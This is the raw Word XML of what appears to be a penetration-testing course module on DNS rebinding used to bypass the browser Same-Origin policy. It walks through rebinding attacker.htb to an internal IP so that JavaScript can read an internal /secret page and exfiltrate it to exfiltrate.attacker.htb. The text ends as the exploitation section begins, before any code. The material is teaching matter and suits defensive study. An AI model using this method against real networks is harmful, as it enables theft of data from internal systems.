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9084" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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E"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DNS Rebinding: Same-Origin Policy Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38DBD7" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00C56D59" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="771DB056">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F569050"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Having understood how to bypass SSRF filters with it, in this section, we will use DNS Rebinding to circumvent some of the restrictions imposed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Same-Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> policy, enabling us to access web applications available only within the victims' local network and exfiltrate data from them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB124D" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00C56D59" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="4902D8B0">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329C129" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Setting &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E3E34F"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Our goal is to exfiltrate data from a web application that we cannot directly access, for instance, because it runs in an internal network behind NAT or a firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08944E5B"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Since DNS rebinding is not a vulnerability in a particular web application, we will not step through a particular web application with the typical whitebox pen-testing methodology but rather discuss the methodology and exploitation of DNS rebinding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EBED1"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Let us assume the following setting: our victim is browsing the internet on their work laptop, located within their company network. The company network contains an internal web application hosting confidential information at </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://192.168.178.1/</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>; therefore, the application is only accessible within the company's internal network. To exfiltrate data from this internal web application, we can utilize DNS rebinding as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B35E3" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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The attacker (us) obtains the domain name </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and configures the DNS server, with a low TTL, to resolve the domain name to the IP address of the web application running a malicious JavaScript payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F16C3" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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The victim accesses the attacker's web application at </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, resolving </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the attacker's web application's IP address and loading the malicious JavaScript payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416913C0" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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The attacker updates/</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>rebinds</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> the DNS setting of the domain </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to resolve to </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>192.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS rebinding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77278F94" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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The JavaScript payload makes an HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> request to </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://attacker.htb/secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, and, due to DNS rebinding, </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> now resolves to </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>192.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Therefore, the victim's browser sends the request to the internal web application. Since the origin does not differ (i.e., scheme, host, and port are the same), it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> considered a </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cross-origin request</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. As a result, the JavaScript code can access the response without violating the </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Same-Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BC1102" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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The JavaScript payload exfiltrates the response to another attacker-controlled domain, for example, </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://exfiltrate.attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E55777" w14:textId="625141C2"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D3FC51D" wp14:editId="5FF99C09">
            <wp:extent cx="5731510" cy="3550920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1647866625" name="Picture 16478666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50920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19592CA0"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Instead of exfiltrating the response, the attacker could use the same methodology to manipulate the internal web application by sending different HTTP requests such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Since this is not considered a cross-origin request, the attacker can set all request parameters freely without violating the Same-Origin policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11B90A"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> The port the internal web application runs on must be the same as the attacker web application to ensure that the origin matches. For instance, if the internal web application runs on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, the attacker web application must also run on the same port, i.e., </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://attacker.htb:8000</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Thus, the attacker must know the IP address and port of the internal web application beforehand for a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF46FF9" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00C56D59" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="62798F99">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B789E43" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5C6575"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Now that we have discussed the attack chain let us explore the exploitation process in more detail. In our example, the internal web application running at </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://192.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
